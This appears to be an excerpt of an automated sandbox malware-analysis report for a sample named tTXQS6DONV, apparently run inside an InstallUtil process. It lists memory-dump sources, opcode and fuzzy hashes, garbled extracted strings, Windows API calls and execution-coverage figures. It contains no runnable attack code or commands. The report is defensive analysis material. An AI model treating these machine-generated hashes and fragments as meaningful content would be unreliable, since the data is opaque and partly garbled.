                                • API String ID:
                                • Opcode ID: 5f43801eac41fb88b5c707cc3844f7db5251fda4db9719f079862bdb372d9b77
                                • Instruction ID: f0cfd607fda80359610462965de3251e3e148f5fc7f7af478400f4562aad24b2
                                • Opcode Fuzzy Hash: 5f43801eac41fb88b5c707cc3844f7db5251fda4db9719f079862bdb372d9b77
                                • Instruction Fuzzy Hash: ADB106B0E25219CBEF44CFA5D9446ADFBB2FB8A300F20957AD41ABB254D734A905CF14
                                Memory Dump Source
                                • Source File: 00000001.00000002.2894154935.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_5e70000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c6f9d178518897328644fd8851ee9e361f87f2b3e4378eb3d61ea320ea41a15d
                                • Instruction ID: 2813c33d3805e1283799a07b05536bda899d9f9b8d8a41082eccc5bf5024b874
                                • Opcode Fuzzy Hash: c6f9d178518897328644fd8851ee9e361f87f2b3e4378eb3d61ea320ea41a15d
                                • Instruction Fuzzy Hash: BFD1F73592065ACACB00EB64D990AADF7B1FF95300F60D79AE5093B251FF706AC5CB80
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 42fd46a8c5d12817b977e53d14f966764057a938b41fb064dd9b39da112878fd
                                • Instruction ID: 80c40e180cf8cf7baf2a06dc2b0d06957162066bd426551ba9b10ef045d4544c
                                • Opcode Fuzzy Hash: 42fd46a8c5d12817b977e53d14f966764057a938b41fb064dd9b39da112878fd
                                • Instruction Fuzzy Hash: 49A120B0E152199FDB14DFA9C580AAEFBB2FF89301F24C1A9D419A7255D7309A41CFA0
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1363c3c3676d3dd3e7a858e580cdfccd952309f544097a349352226f59169411
                                • Instruction ID: a34e00ad9a5cb4c4083725ab4e2c3ae5bafc0d39d87fe0cb2e3bff64bfeae43e
                                • Opcode Fuzzy Hash: 1363c3c3676d3dd3e7a858e580cdfccd952309f544097a349352226f59169411
                                • Instruction Fuzzy Hash: 95918B70A1120ACFDB04DFA8E590ADDBBF5FF8A304F20D569D004BB259DB35AA458F50
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3588e64290a9d337b6b0cf13e138a73c6e7381c04a799be5c58b65a893ef06d3
                                • Instruction ID: 07414849c6b48a3075821566257805ce0dfa74831d5eef55b51e447b39c7b360
                                • Opcode Fuzzy Hash: 3588e64290a9d337b6b0cf13e138a73c6e7381c04a799be5c58b65a893ef06d3
                                • Instruction Fuzzy Hash: BE813674E1524ADFCB48CFA9D48099DFBF2FF89210F1485A6E428EB265D7309A41CF51
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e9cf4a129ce677682f44cdf1f5ec78bb397fda881bb03e3e8ba0ae229ab1b9ba
                                • Instruction ID: 8650758b27354133d3d22f64bb9c6089481a2ad7ae506b57e2bfb1af38de3fb6
                                • Opcode Fuzzy Hash: e9cf4a129ce677682f44cdf1f5ec78bb397fda881bb03e3e8ba0ae229ab1b9ba
                                • Instruction Fuzzy Hash: 4B811BB0E15219CFEB54CFA9D980A9EFBB2FF89200F24C1AAD419A7255D7309A41CF50
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d166c589d25cf42e20617ccacc23cc8d81fd0cf0e1aa7628248fe60ece68db5a
                                • Instruction ID: 90884195459f58285b05b36b5c7ac33fc239e2d3310aabdb061178d16a8cee44
                                • Opcode Fuzzy Hash: d166c589d25cf42e20617ccacc23cc8d81fd0cf0e1aa7628248fe60ece68db5a
                                • Instruction Fuzzy Hash: CD71F474E1521ADFDB48CFA9D48499EFBF2FF89210F148566E428AB325D730AA41CF50
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 681c79c63ecfb6c3362e63a4122813ebfee1c97caaf48e96989e4b8ef79b97d3
                                • Instruction ID: b5e40f80e98cbe6626f3d6e095cfd0ac23b2c20acb5306248e7593353d7a4e9a
                                • Opcode Fuzzy Hash: 681c79c63ecfb6c3362e63a4122813ebfee1c97caaf48e96989e4b8ef79b97d3
                                • Instruction Fuzzy Hash: 8C712BB0E152199FEB54CFA9C980A9EBBF2FF89200F14C1AAD419A7355DB309A41CF51
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6b02211aa5d89d6519e4cd4ecb593378887e81cb85e45cbecbbb7b32ebb60f65
                                • Instruction ID: 176b20834e7d1512537b5da78e25dc9520c8ed4fffe2459ce47508609ceea2c8
                                • Opcode Fuzzy Hash: 6b02211aa5d89d6519e4cd4ecb593378887e81cb85e45cbecbbb7b32ebb60f65
                                • Instruction Fuzzy Hash: 0C71E574E1111ADFDB48CFA9D58499EFBF2FF89210F148566E428AB325D730AA41CF50
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ca2fc4941151ff44c0c8a00696f70bd4b94ca1089a6853f07b833b49612e7e2d
                                • Instruction ID: bd3b51d02f2ed5ee8832d66a9f2c87d1817aae75f40da580db17ccbb85529540
                                • Opcode Fuzzy Hash: ca2fc4941151ff44c0c8a00696f70bd4b94ca1089a6853f07b833b49612e7e2d
                                • Instruction Fuzzy Hash: 15712BB4E15219CFEB54CFA9C980A9EBBF2FF89200F24C5AAD419A7355D7309A41CF50
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4fa0b36f9e14dba1d52888e6512f49cc5bf542b71fc72fea357a4c75ba8b9673
                                • Instruction ID: 19490e625a8478ce60cb9c4db1570ca480286ed2a83c1884da002893cf268668
                                • Opcode Fuzzy Hash: 4fa0b36f9e14dba1d52888e6512f49cc5bf542b71fc72fea357a4c75ba8b9673
                                • Instruction Fuzzy Hash: 935131B0E11119CBDB24DFA9D5806AEFBB3FF89201F24C1BAD419A7245D7305A41CF61
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9cf2c53d80ef0b999c4d70c2d7aa73af986b92a7beb9521a6c3757e397b0522d
                                • Instruction ID: d5572ce9f95c8972f42643bd45dfaf6bf43fa6850781aaef896add2ba6e0fd22
                                • Opcode Fuzzy Hash: 9cf2c53d80ef0b999c4d70c2d7aa73af986b92a7beb9521a6c3757e397b0522d
                                • Instruction Fuzzy Hash: 9D5131B0D11215CBDB24DFA9C5805AEFBB3FF89201F24C57AD419A7245EB305941CF61
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d25daceb26a0a5620f49af72b409fbf388245a77c4f9151a13920fc48bceafc3
                                • Instruction ID: 3edb570236a1351787e4e463c5f3b17df50ee60c40934ccfad5b42e09dfcc456
                                • Opcode Fuzzy Hash: d25daceb26a0a5620f49af72b409fbf388245a77c4f9151a13920fc48bceafc3
                                • Instruction Fuzzy Hash: 98512EB0E111198BEB24DFA9C5805AEFBB3FF89201F24C57AD419A7255DB305A41CF61
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 684152e2d33c71122d40ea34ad9d6a7b081d14a980a7d41e71c9d0499299c67e
                                • Instruction ID: 03f45bb7c4ff9c4a0a62caf751f81b903fddbaa36a18437ff8a04454691e9589
                                • Opcode Fuzzy Hash: 684152e2d33c71122d40ea34ad9d6a7b081d14a980a7d41e71c9d0499299c67e
                                • Instruction Fuzzy Hash: 29514AB1E106188BEB68DF6B8D4579EFBF7AFC9300F14C1BA951CA6264DB3019858F11
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e702d1b4b763e26d5d4d9c375b7937f27cedd42fe2afef6a098a7f04285856aa
                                • Instruction ID: 04780f4d7d1ad51b794e011b8f6262d0986f2ac111e3b265aea78103ca448ebb
                                • Opcode Fuzzy Hash: e702d1b4b763e26d5d4d9c375b7937f27cedd42fe2afef6a098a7f04285856aa
                                • Instruction Fuzzy Hash: AB412CB1E116188BEB58DF6B8D4579EFAF3BFC8300F14C5BA950CA6264EB3019858F11
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6e5015c31beabb3afa1b62a84b4a3201c91a1a4f04fbdb98b9eec3d223ac6465
                                • Instruction ID: fe7bc8be0bc962438680dff46e2c4f38e36fbd44f4b97ea7e84f9c5f12d0142f
                                • Opcode Fuzzy Hash: 6e5015c31beabb3afa1b62a84b4a3201c91a1a4f04fbdb98b9eec3d223ac6465
                                • Instruction Fuzzy Hash: DC4128B1E116198BEB68DF6B8D4579EFAF3BFC8300F14C5BA951CA6264DB3009858F11
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1ae06a8e56e5c74dc0522bd315c5ebffdb30042187536a96c421746f668eab88
                                • Instruction ID: 240ba74c694284257e6bb0b6e1d842d5849dc471db64b3a9a4e368df6ada1a55
                                • Opcode Fuzzy Hash: 1ae06a8e56e5c74dc0522bd315c5ebffdb30042187536a96c421746f668eab88
                                • Instruction Fuzzy Hash: 1541C7B4E0120EDBDB44CFAAC5415AEFBF2EF89300F24C5A9C419B7214E7349A419F95
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ee9d8c9db2f2a4d0f71fc38662efcd0d9e6c67502b28623aaf7150b40cdeb8ed
                                • Instruction ID: 14ac474dc6a8dd0edcdecbc9c43e104cf13d965a2e42bf1e813011feb6e13efb
                                • Opcode Fuzzy Hash: ee9d8c9db2f2a4d0f71fc38662efcd0d9e6c67502b28623aaf7150b40cdeb8ed
                                • Instruction Fuzzy Hash: D341D7B4E0120EDFDB44CFAAC5415AEFBF2EF88300F24C5AAC419B7214E7349A419B95
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4d7c01f520e835932333c10917d92121b6575e7b2c49d86d89462c10018cb5de
                                • Instruction ID: d74306b024259a39e86278c70d3f89ace54c03de76413fa968f22f84d175c62a
                                • Opcode Fuzzy Hash: 4d7c01f520e835932333c10917d92121b6575e7b2c49d86d89462c10018cb5de
                                • Instruction Fuzzy Hash: 6F41E8B5E0120EDBDB04CFAAC5415AEFBF2EF89310F24C5AAC419B7214E7349A419B95
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895061964.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7420000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 215e1531f63fefd6b9071ee0ddb24198d41307f2957637940ae23b3836470725
                                • Instruction ID: b16851936e4e143947cf32995d4530a378cf1fc3137fe01f8d15502cf7f50119
                                • Opcode Fuzzy Hash: 215e1531f63fefd6b9071ee0ddb24198d41307f2957637940ae23b3836470725
                                • Instruction Fuzzy Hash: A821D5B2E00A199BEB18CF6BD84069EFBF7EFC8210F54C47AC518A6214EB3415168F51
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6bc378f0a4a6fb18b6652c14f132f4b19ce3e1b3636043d46d9a6fdff6288fcd
                                • Instruction ID: 6b2b8520b4431c05aa4db6cf19c60febaa968bf0521e76664d6acf779954fd84
                                • Opcode Fuzzy Hash: 6bc378f0a4a6fb18b6652c14f132f4b19ce3e1b3636043d46d9a6fdff6288fcd
                                • Instruction Fuzzy Hash: 2A11BCB5E116199BEB5CCF6BD94469EFAF3AFC8200F14C07AC518B6264EB3405468F51
                                Memory Dump Source
                                • Source File: 00000001.00000002.2895263698.0000000007B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_7b90000_tTXQS6DONV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eed33d2bd3da576515fdbef57bdd24b66013b2b56a7bee533c965d062c7142ef
                                • Instruction ID: f44ac5eb27522b346fa7e827905a080d299ee874da63cf33b399a2c331a7742a
                                • Opcode Fuzzy Hash: eed33d2bd3da576515fdbef57bdd24b66013b2b56a7bee533c965d062c7142ef
                                • Instruction Fuzzy Hash: 8A119AB1E116199BEB5CCFABC84469EFAF3AFC8200F14C07AD918B6264EB3405468F51

                                Execution Graph

                                Execution Coverage:6.9%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:11
                                Total number of Limit Nodes:2
                                [execution graph rendering omitted; nodes call DuplicateHandle, GetCurrentProcess, GetCurrentThread and GetCurrentThreadId]
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: X\-$'e\-$.Z\-$5X\-$<[\-$?e\-$@[\-$Nj\-$SZ\-$YX\-$[[\-$zZ\-$ze\-$X\-$Z\-$j\-
                                • API String ID: 0-631647230
                                • Opcode ID: cb6b02104798ab5d09e5e9d4a74ff296efeef982dcb001fa03f40553a20930c9
                                • Instruction ID: 7ea534662f13754452506923bf32f09d273b1f6bb7930b7cff80ca598377c8f0
                                • Opcode Fuzzy Hash: cb6b02104798ab5d09e5e9d4a74ff296efeef982dcb001fa03f40553a20930c9
                                • Instruction Fuzzy Hash: 3EE23B34E002199FDB64EBA8C994A9DB7F2FF85300F5485AAE409AB351EB70DD81CF51
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: _\-$'C\-$6C\-$E\\-$JB\-$@\-$B\-$\\-
                                • API String ID: 0-3056091361
                                • Opcode ID: b7cda5879e894dae6ed10edbea1dd085a38cb48bdd708037fbfed63fc77a9fd0
                                • Instruction ID: 6f67f02983acfd031084982cb845f80d8e94f3cf976f0b45e6d89a5b8ae0fe8f
                                • Opcode Fuzzy Hash: b7cda5879e894dae6ed10edbea1dd085a38cb48bdd708037fbfed63fc77a9fd0
                                • Instruction Fuzzy Hash: 93627C34B002298FDB54EBA8D5947ADB7F2EF89210F148469E546EF350EB75EC41CB90

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: Ls\-$Ss\-$ms\-$|s\-$r\-
                                • API String ID: 0-1260384299
                                • Opcode ID: 1590f78f341170d1140aad05fd40476546d13e18a32e0ad32a7887f3d1b0908b
                                • Instruction ID: 34a372c3e16b8f563798e2ce45135ae2ec1e4b437bdc58c11bdfb2dfe64605c4
                                • Opcode Fuzzy Hash: 1590f78f341170d1140aad05fd40476546d13e18a32e0ad32a7887f3d1b0908b
                                • Instruction Fuzzy Hash: 2F028130B012169BDB58EBB8D8507AEB7F2FF85650F148569E806EF380EB75DC418B91
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 60c07fcd8e11ff2103cb529bedc37a0d40a3a2f7eb063505014e6442e30e5e00
                                • Instruction ID: 252baf22963cfaa5e7497765ecb9e5288c5347cdd60c5f3a54245171bdc3de98
                                • Opcode Fuzzy Hash: 60c07fcd8e11ff2103cb529bedc37a0d40a3a2f7eb063505014e6442e30e5e00
                                • Instruction Fuzzy Hash: 9E53E531D10B1A8ACB51EF68C880699F7B1FF99300F15D79AE4587B121EB70AAD4CF81
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7b40c97350c7bda955c9123e8775354fe27cc9c2829326e358c84977aa9d6388
                                • Instruction ID: 5d207d847609bb321349668a81e3c65f47eb9cadacb46eecd121b656ee281eb2
                                • Opcode Fuzzy Hash: 7b40c97350c7bda955c9123e8775354fe27cc9c2829326e358c84977aa9d6388
                                • Instruction Fuzzy Hash: BE33FC31D1065A8EDB11EF68C88059DF7B1FF99300F15D69AE458BB221EB70AAC5CF81
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: $
                                • API String ID: 0-3993045852
                                • Opcode ID: 7dce778df6b2c68743588884749d88c51f882f2cd2a976f1228b7c0227ef5efc
                                • Instruction ID: 8b14b00fb2f450cc8afbc7c898929e9848cd8246edd325f7e8dc8e4b0b7851db
                                • Opcode Fuzzy Hash: 7dce778df6b2c68743588884749d88c51f882f2cd2a976f1228b7c0227ef5efc
                                • Instruction Fuzzy Hash: C122A031E002658FDB64EBA4C4906AFB7F2FF85350F248469E44AEB355EA719C41CB91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: H\-$5H\-$>H\-$oH\-$xH\-
                                • API String ID: 0-1507940824
                                • Opcode ID: d36d63491f0e8f25fc2e813cae793453890b6c5acc76b121c3854753124e220a
                                • Instruction ID: c463406e845273ce2279b95c7a1b85b4a8e629b36c03ff3100f8f34eb638f9a3
                                • Opcode Fuzzy Hash: d36d63491f0e8f25fc2e813cae793453890b6c5acc76b121c3854753124e220a
                                • Instruction Fuzzy Hash: 0EA14374F101199FEFA4EBACD4A07AEB6F6EB89350F204426E405EF395DA34DC418B61

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: /t\-$7w\-$Ot\-$~w\-$u\-
                                • API String ID: 0-1551691544
                                • Opcode ID: 0c21ac7477ec0e64db8556d4f10c5911620e40ec85e6c9766f5c18f01c9131a1
                                • Instruction ID: f50766901d092b43c4577afa301621214acb777f47386340b87f168d9cdcfb0c
                                • Opcode Fuzzy Hash: 0c21ac7477ec0e64db8556d4f10c5911620e40ec85e6c9766f5c18f01c9131a1
                                • Instruction Fuzzy Hash: EEC1ED74F0126A8FDB68EF64D8907DEB7F2BF89340F1045A9D409AB344EA709D818F91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: /t\-$7w\-$Ot\-$~w\-$u\-
                                • API String ID: 0-1551691544
                                • Opcode ID: bb85304092ee6cbb6db9f8fde652cffa987bac9f9f6393b14e28f2e1aefd936c
                                • Instruction ID: e19e9df691ba2c4af2c1a817b95af8c7a3a8a0982ccc20a79f7d79ff8dca1e5b
                                • Opcode Fuzzy Hash: bb85304092ee6cbb6db9f8fde652cffa987bac9f9f6393b14e28f2e1aefd936c
                                • Instruction Fuzzy Hash: 4A91FD74E012699FDBA8EB64D891BDDB7F1FF89700F1044A9D419AB340EA709D80CF91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 030BB1CE
                                • GetCurrentThread.KERNEL32 ref: 030BB20B
                                • GetCurrentProcess.KERNEL32 ref: 030BB248
                                • GetCurrentThreadId.KERNEL32 ref: 030BB2A1
                                Memory Dump Source
                                • Source File: 00000005.00000002.3408345631.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_30b0000_InstallUtil.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 9925293fed651ae045921a35d5949c1430b8bbca6c0c1209de09967b0c6d5350
                                • Instruction ID: 99c631cb4d5ab4187468efa69b4672e9138d657f6d0342bca2e09a92c07d5213
                                • Opcode Fuzzy Hash: 9925293fed651ae045921a35d5949c1430b8bbca6c0c1209de09967b0c6d5350
                                • Instruction Fuzzy Hash: 7D5154B0901349CFEB54DFA9D548BDEBBF5FB88304F248419E509A7360DB34A944CB65

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 030BB1CE
                                • GetCurrentThread.KERNEL32 ref: 030BB20B
                                • GetCurrentProcess.KERNEL32 ref: 030BB248
                                • GetCurrentThreadId.KERNEL32 ref: 030BB2A1
                                Memory Dump Source
                                • Source File: 00000005.00000002.3408345631.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_30b0000_InstallUtil.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: dbbee3fd887516ee241717a5f2ee3caf57a2e4802570f90896d1a3853a654a4d
                                • Instruction ID: dddb4d69ccd86ce29bb12699066caf1447b38c038c0dc2d9f9280995dceb21f0
                                • Opcode Fuzzy Hash: dbbee3fd887516ee241717a5f2ee3caf57a2e4802570f90896d1a3853a654a4d
                                • Instruction Fuzzy Hash: 7D5164B0901349CFEB54CFA9D548BDEBBF5FB88304F208419E409A7360DB346944CB65

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: 9^\-$P_\-$Y_\-
                                • API String ID: 0-50222206
                                • Opcode ID: cd7bc88a8a3f223b7c96e9db4ad9d24821b5ee1b3065f22629d40c676a5afb3f
                                • Instruction ID: 907bbfe5bb4d3e0dbb2f944682a9a6ba8f31e51e9652036fb76b758fdcda4fea
                                • Opcode Fuzzy Hash: cd7bc88a8a3f223b7c96e9db4ad9d24821b5ee1b3065f22629d40c676a5afb3f
                                • Instruction Fuzzy Hash: 29914F30B052594BDB59EBB9C4647AEB7F2AFC5300F148469E40AEB385EE78DC428791

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: 9^\-$P_\-$Y_\-
                                • API String ID: 0-50222206
                                • Opcode ID: b31bad9fd9f963bdc6daa811b19f6f949a227aac09fc95383dc3e47db3f1684f
                                • Instruction ID: cc7af3d52e35603378d5aad3e429e91f01336c430aeb1c532711ed58024007a0
                                • Opcode Fuzzy Hash: b31bad9fd9f963bdc6daa811b19f6f949a227aac09fc95383dc3e47db3f1684f
                                • Instruction Fuzzy Hash: 00813F34B112594BDB58EBB8C4607AEB6F6AFC9700F148429E40AEF384EF74DC428791

                                Control-flow Graph
                                • Rendered graph (legend: Executed / Not Executed); node/edge list not reproduced. First listed block: 6a3f610. Call edges to: 6a3fbc3, 6a3fbbf.
                                Strings
